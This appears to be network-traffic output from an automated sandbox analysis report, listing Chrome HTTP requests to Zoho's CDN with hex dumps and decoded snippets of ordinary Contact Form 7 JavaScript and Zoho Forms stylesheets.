                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 73 2d 73 70 69 6e 6e 65 72 22 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 69 6e 73 65 72 74 41 64 6a 61 63 65 6e 74 48 54 4d 4c 28 22 61 66 74 65 72 65 6e 64 22 2c 27 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 77 70 63 66 37 2d 73 70 69 6e 6e 65 72 22 3e 3c 2f 73 70 61 6e 3e 27 29 7d 29 29 2c 28 65 3d 3e 7b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 77 70 63 66 37 2d 65 78 63 6c 75 73 69 76 65 2d 63 68 65 63 6b 62 6f 78 22 29 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 29 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28
                                                                                                                                                                                              Data Ascii: s-spinner").forEach((e=>{e.insertAdjacentHTML("afterend",'<span class="wpcf7-spinner"></span>')})),(e=>{e.querySelectorAll(".wpcf7-exclusive-checkbox").forEach((t=>{t.addEventListener("change",(t=>{const a=t.target.getAttribute("name");e.querySelectorAll(
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 77 70 63 66 37 72 65 73 65 74 22 2c 28 65 3d 3e 7b 74 28 29 7d 29 29 7d 29 28 65 29 2c 28 65 3d 3e 7b 63 6f 6e 73 74 20 61 3d 28 65 2c 61 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 61 72 74 69 6e 67 2d 76 61 6c 75 65 22 29 29 2c 72 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 61 78 69 6d 75 6d 2d 76 61 6c 75 65 22 29 29 2c 63 3d 74 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 69 6e 69 6d 75 6d 2d 76 61 6c 75 65 22 29 29 2c 6f 3d 65 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 6f 77 6e 22 29 3f 6e 2d 61 2e 76 61 6c 75 65 2e 74 72 69 6d 28 29 2e 6c 65 6e
                                                                                                                                                                                              Data Ascii: ,e.addEventListener("wpcf7reset",(e=>{t()}))})(e),(e=>{const a=(e,a)=>{const n=t(e.getAttribute("data-starting-value")),r=t(e.getAttribute("data-maximum-value")),c=t(e.getAttribute("data-minimum-value")),o=e.classList.contains("down")?n-a.value.trim().len
                                                                                                                                                                                              2024-11-20 20:28:23 UTC1369INData Raw: 3e 7b 74 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 22 2e 77 70 63 66 37 2d 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 29 26 26 77 70 63 66 37 2e 76 61 6c 69 64 61 74 65 28 65 2c 7b 74 61 72 67 65 74 3a 74 2e 74 61 72 67 65 74 7d 29 7d 29 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 77 70 63 66 37 73 74 61 74 75 73 63 68 61 6e 67 65 64 22 2c 28 74 3d 3e 7b 63 6f 6e 73 74 20 61 3d 74 2e 64 65 74 61 69 6c 2e 73 74 61 74 75 73 3b 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 61 63 74 69 76 65 2d 6f 6e 2d 61 6e 79 22 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 6e 65 72 74 22 29 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 61 63 74 69 76 65 2d
                                                                                                                                                                                              Data Ascii: >{t.target.closest(".wpcf7-form-control")&&wpcf7.validate(e,{target:t.target})})),e.addEventListener("wpcf7statuschanged",(t=>{const a=t.detail.status;e.querySelectorAll(".active-on-any").forEach((e=>{e.removeAttribute("inert"),e.classList.remove("active-


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              49192.168.2.549780199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC598OUTGET /forms/css/formsthirdparty.2755260429cd02c98112dac6f4b5b8ce.css HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC755INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 78475
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "f48a549468a1647a59b91c66c827b243"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 29 Mar 2024 08:44:31 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: HIT
                                                                                                                                                                                              nb-request-id: 29267de13ba9ae9b51c7f6e618224f82
                                                                                                                                                                                              z-origin-id: sa1-4d640ae68c284f76bfce380b8df89284
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC3341INData Raw: 2f 2a 20 24 49 64 24 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 49 4d 50 4f 52 54 41 4e 54 20 4e 4f 54 45 3a 20 54 68 69 73 20 63 6f 6d 70 72 65 73 73 65 64 20 63 73 73 20 66 69 6c 65 20 69 6e 63 6c 75 64 65 73 20 74 68 69 72 64 70 61 72 74 79 20 73 74 79 6c 65 73 68 65 65 74 73 0a 20 2a 2f 0a 0a 2f 2a 20 2a 20 43 53 53 20 53 74 79 6c 65 73 20 74 68 61 74 20 61 72 65 20 6e 65 65 64 65 64 20 62 79 20 6a 53 63 72 6f 6c 6c 50 61 6e 65 20 66 6f 72 20 69 74 20 74 6f 20 6f 70 65 72 61 74 65 20 63 6f 72 72 65 63 74 6c 79 2e 20 2a 20 2a 20 49 6e 63 6c 75 64 65 20 74 68 69 73 20 73 74 79 6c 65 73 68 65 65 74 20 69 6e 20 79 6f 75 72 20 73 69 74 65 20 6f 72 20 63 6f 70 79 20 61 6e 64 20 70 61 73 74 65 20 74 68 65 20 73 74 79 6c 65 73 20 62 65 6c 6f 77 20 69 6e 74 6f 20 79 6f
                                                                                                                                                                                              Data Ascii: /* $Id$ *//** * IMPORTANT NOTE: This compressed css file includes thirdparty stylesheets *//* * CSS Styles that are needed by jScrollPane for it to operate correctly. * * Include this stylesheet in your site or copy and paste the styles below into yo
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 6e 3b 09 70 61 64 64 69 6e 67 3a 20 30 3b 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 09 77 69 64 74 68 3a 20 31 70 78 3b 7d 2e 75 69 2d 68 65 6c 70 65 72 2d 72 65 73 65 74 20 7b 09 6d 61 72 67 69 6e 3a 20 30 3b 09 70 61 64 64 69 6e 67 3a 20 30 3b 09 62 6f 72 64 65 72 3a 20 30 3b 09 6f 75 74 6c 69 6e 65 3a 20 30 3b 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 33 3b 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 30 25 3b 09 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 7d 2e 75 69 2d 68 65 6c 70 65 72 2d 63 6c 65 61 72 66 69 78 3a 62 65 66 6f 72 65 2c 2e 75 69 2d 68 65 6c 70 65 72 2d 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 20 7b 09 63 6f 6e 74 65 6e 74 3a 20 22 22 3b
                                                                                                                                                                                              Data Ascii: n;padding: 0;position: absolute;width: 1px;}.ui-helper-reset {margin: 0;padding: 0;border: 0;outline: 0;line-height: 1.3;text-decoration: none;font-size: 100%;list-style: none;}.ui-helper-clearfix:before,.ui-helper-clearfix:after {content: "";
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 7d 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 74 69 74 6c 65 20 7b 09 6d 61 72 67 69 6e 3a 20 30 20 32 2e 33 65 6d 3b 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 38 65 6d 3b 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 7d 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 74 69 74 6c 65 20 73 65 6c 65 63 74 20 7b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 09 6d 61 72 67 69 6e 3a 20 31 70 78 20 30 3b 7d 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 73 65 6c 65 63 74 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 6d 6f 6e 74 68 2c 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 73 65 6c 65 63 74 2e 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 79 65 61 72 20
                                                                                                                                                                                              Data Ascii: }.ui-datepicker .ui-datepicker-title {margin: 0 2.3em;line-height: 1.8em;text-align: center;}.ui-datepicker .ui-datepicker-title select {font-size: 1em;margin: 1px 0;}.ui-datepicker select.ui-datepicker-month,.ui-datepicker select.ui-datepicker-year
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 75 69 2d 6d 65 6e 75 2d 69 63 6f 6e 73 20 2e 75 69 2d 6d 65 6e 75 2d 69 74 65 6d 20 7b 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 7d 2e 75 69 2d 6d 65 6e 75 20 2e 75 69 2d 69 63 6f 6e 20 7b 09 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 09 74 6f 70 3a 20 30 3b 09 62 6f 74 74 6f 6d 3a 20 30 3b 09 6c 65 66 74 3a 20 2e 32 65 6d 3b 09 6d 61 72 67 69 6e 3a 20 61 75 74 6f 20 30 3b 7d 2e 75 69 2d 6d 65 6e 75 20 2e 75 69 2d 6d 65 6e 75 2d 69 63 6f 6e 20 7b 09 6c 65 66 74 3a 20 61 75 74 6f 3b 09 72 69 67 68 74 3a 20 30 3b 7d 2e 75 69 2d 70 72 6f 67 72 65 73 73 62 61 72 20 7b 09 68 65 69 67 68 74 3a 20 32 65 6d 3b 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 09 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 7d 2e 75 69 2d 70
                                                                                                                                                                                              Data Ascii: ui-menu-icons .ui-menu-item {padding-left: 2em;}.ui-menu .ui-icon {position: absolute;top: 0;bottom: 0;left: .2em;margin: auto 0;}.ui-menu .ui-menu-icon {left: auto;right: 0;}.ui-progressbar {height: 2em;text-align: left;overflow: hidden;}.ui-p
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 7d 2e 75 69 2d 73 65 6c 65 63 74 6d 65 6e 75 2d 6d 65 6e 75 20 2e 75 69 2d 6d 65 6e 75 20 2e 75 69 2d 73 65 6c 65 63 74 6d 65 6e 75 2d 6f 70 74 67 72 6f 75 70 20 7b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 09 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 2e 34 65 6d 3b 09 6d 61 72 67 69 6e 3a 20 30 2e 35 65 6d 20 30 20 30 20 30 3b 09 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 09 62 6f 72 64 65 72 3a 20 30 3b 7d 2e 75 69 2d 73 65 6c 65 63 74 6d 65 6e 75 2d 6f 70 65 6e 20 7b 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 7d 2e 75 69 2d
                                                                                                                                                                                              Data Ascii: erflow-x: hidden;padding-bottom: 1px;}.ui-selectmenu-menu .ui-menu .ui-selectmenu-optgroup {font-size: 1em;font-weight: bold;line-height: 1.5;padding: 2px 0.4em;margin: 0.5em 0 0 0;height: auto;border: 0;}.ui-selectmenu-open {display: block;}.ui-
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 20 7b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 37 38 66 30 38 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 36 61 38 32 38 20 75 72 6c 28 22 69 6d 61 67 65 73 2f 75 69 2d 62 67 5f 67 6c 6f 73 73 2d 77 61 76 65 5f 33 35 5f 66 36 61 38 32 38 5f 35 30 30 78 31 30 30 2e 70 6e 67 22 29 20 35 30 25 20 35 30 25 20 72 65 70 65 61 74 2d 78 3b 09 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 7d 2e 75 69 2d 77 69 64 67 65 74 2d 68 65 61 64 65 72 20 61 20 7b 09 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 7d 2f 2a 20 49 6e 74 65 72 61 63 74 69 6f 6e 20 73 74 61 74 65 73 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 2e 75 69 2d
                                                                                                                                                                                              Data Ascii: {border: 1px solid #e78f08;background: #f6a828 url("images/ui-bg_gloss-wave_35_f6a828_500x100.png") 50% 50% repeat-x;color: #ffffff;font-weight: bold;}.ui-widget-header a {color: #ffffff;}/* Interaction states----------------------------------*/.ui-
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 70 78 20 30 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 61 72 61 74 2d 32 2d 6e 2d 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 32 38 70 78 20 30 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 61 72 61 74 2d 32 2d 65 2d 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 34 34 70 78 20 30 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 20 2d 31 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 6e 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 36 70 78 20 2d 31 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 74 72 69 61 6e 67 6c 65 2d 31 2d 65 20 7b
                                                                                                                                                                                              Data Ascii: px 0; }.ui-icon-carat-2-n-s { background-position: -128px 0; }.ui-icon-carat-2-e-w { background-position: -144px 0; }.ui-icon-triangle-1-n { background-position: 0 -16px; }.ui-icon-triangle-1-ne { background-position: -16px -16px; }.ui-icon-triangle-1-e {
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 78 20 2d 39 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 6e 6f 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 36 34 70 78 20 2d 39 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 6d 61 69 6c 2d 63 6c 6f 73 65 64 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 30 70 78 20 2d 39 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 6d 61 69 6c 2d 6f 70 65 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 39 36 70 78 20 2d 39 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 73 75 69 74 63 61 73 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 31 31 32 70 78 20 2d 39 36 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 6f 6d 6d 65 6e 74 20 7b 20 62 61 63 6b 67
                                                                                                                                                                                              Data Ascii: x -96px; }.ui-icon-note { background-position: -64px -96px; }.ui-icon-mail-closed { background-position: -80px -96px; }.ui-icon-mail-open { background-position: -96px -96px; }.ui-icon-suitcase { background-position: -112px -96px; }.ui-icon-comment { backg
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 20 2d 33 32 70 78 20 2d 31 39 32 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 69 72 63 6c 65 2d 74 72 69 61 6e 67 6c 65 2d 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 34 38 70 78 20 2d 31 39 32 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 69 72 63 6c 65 2d 74 72 69 61 6e 67 6c 65 2d 73 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 36 34 70 78 20 2d 31 39 32 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 69 72 63 6c 65 2d 74 72 69 61 6e 67 6c 65 2d 77 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 2d 38 30 70 78 20 2d 31 39 32 70 78 3b 20 7d 2e 75 69 2d 69 63 6f 6e 2d 63 69 72 63 6c 65 2d 74 72 69 61 6e 67 6c 65 2d 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69
                                                                                                                                                                                              Data Ascii: -32px -192px; }.ui-icon-circle-triangle-e { background-position: -48px -192px; }.ui-icon-circle-triangle-s { background-position: -64px -192px; }.ui-icon-circle-triangle-w { background-position: -80px -192px; }.ui-icon-circle-triangle-n { background-posi
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 61 79 3a 20 62 6c 6f 63 6b 3b 20 7d 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 73 20 7b 20 20 6c 69 73 74 2d 73 74 79 6c 65 3a 20 6e 6f 6e 65 3b 20 20 6d 61 72 67 69 6e 3a 20 30 3b 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 20 7b 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 3b 20 20 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 20 20 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 20 7d 20 20 2e 73 65 6c 65 63 74 32 2d 72 65 73 75 6c 74 73 5f 5f 6f 70 74 69 6f 6e 5b 61 72 69 61 2d 73 65 6c 65 63 74 65 64 5d 20 7b 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 20 7d 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61
                                                                                                                                                                                              Data Ascii: ay: block; }.select2-results__options { list-style: none; margin: 0; padding: 0; }.select2-results__option { padding: 6px; user-select: none; -webkit-user-select: none; } .select2-results__option[aria-selected] { cursor: pointer; }.select2-conta


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              50192.168.2.549781199.67.80.864431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:22 UTC592OUTGET /forms/css/formslive.717c57bbabd2726cae09dda2681c5aa2.css HTTP/1.1
                                                                                                                                                                                              Host: static.zohocdn.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://forms.zohopublic.com/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:23 UTC845INHTTP/1.1 200
                                                                                                                                                                                              Server: ZGS
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:23 GMT
                                                                                                                                                                                              Content-Type: text/css;charset=UTF-8
                                                                                                                                                                                              Content-Length: 305392
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Set-Cookie: zalb_a944c53744=52a1643560b8021a1a57fe97f197351f; Path=/; Secure; HttpOnly
                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                              Cache-Control: public, max-age=7776000, immutable
                                                                                                                                                                                              ETag: "9efc024f5ab49fba936c4032432ed57b"
                                                                                                                                                                                              Content-Language: en-US
                                                                                                                                                                                              Last-Modified: Fri, 01 Nov 2024 07:26:37 GMT
                                                                                                                                                                                              Access-Control-Expose-Headers: *
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              strict-transport-security: max-age=15768000
                                                                                                                                                                                              Timing-Allow-Origin: *
                                                                                                                                                                                              x-cache: MISS
                                                                                                                                                                                              nb-request-id: 53a716068c51078755c5e8348b38da84
                                                                                                                                                                                              z-origin-id: sa1-3b5a63a167f5450fa34dd0172e9a2b51
                                                                                                                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                              Strict-Transport-Security: max-age=64072000; includeSubDomains; preload
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:23 UTC3251INData Raw: 2f 2a 20 24 49 64 24 20 2a 2f 0a 2f 2a 2a 0a 20 2a 20 49 4d 50 4f 52 54 41 4e 54 20 4e 4f 54 45 3a 20 54 68 69 73 20 63 6f 6d 70 72 65 73 73 65 64 20 63 73 73 20 66 69 6c 65 20 69 6e 63 6c 75 64 65 73 20 5a 6f 68 6f 20 46 6f 72 6d 73 20 4c 69 76 65 20 50 61 67 65 20 73 74 79 6c 65 73 68 65 65 74 73 0a 20 2a 2f 0a 0a 20 2f 2a 20 62 75 74 74 6f 6e 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 2a 2f 2e 62 75 74 74 6f 6e 20 7b 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 09 7a 6f 6f 6d 3a 20 31 3b 20 20 2a 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 3b 09 6d 61
                                                                                                                                                                                              Data Ascii: /* $Id$ *//** * IMPORTANT NOTE: This compressed css file includes Zoho Forms Live Page stylesheets */ /* button ---------------------------------------------- */.button {display: inline-block;zoom: 1; *display: inline;vertical-align: baseline;ma
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 3b 7d 2e 77 68 69 74 65 20 7b 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 09 62 6f 72 64 65 72 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 63 63 63 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 7d 2e 77 68 69 74 65 3a 68 6f 76 65 72 20 7b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 2e 62 6c 75 65 20 7b 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 3b 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 32 46 34 30 34 45 3b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 46 34 30 34 45 3b 7d 2e 74 68 65 6d 65 45 64 69 74 6f 72 41 63 74 69 6f 6e 20 2e 62 6c 75 65
                                                                                                                                                                                              Data Ascii: e;}.white {color: #444;border: solid 1px #ccc;background: #fff;}.white:hover {border: 1px solid #aaa;background: #fff;text-decoration: none;}.blue {color: #fff;border: 1px solid;border-color: #2F404E;background: #2F404E;}.themeEditorAction .blue
                                                                                                                                                                                              2024-11-20 20:28:23 UTC4096INData Raw: 65 3b 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 09 70 61 64 64 69 6e 67 3a 20 37 70 78 20 32 30 70 78 3b 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 2e 62 74 6e 43 75 72 76 65 3a 68 6f 76 65 72 20 7b 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 2e 62 74 6e 53 61 76 65 43 75 72 76 65 20 7b 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 09 6f 75 74 6c 69 6e 65 3a 20 6e 6f 6e 65 3b 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 09 74 65 78
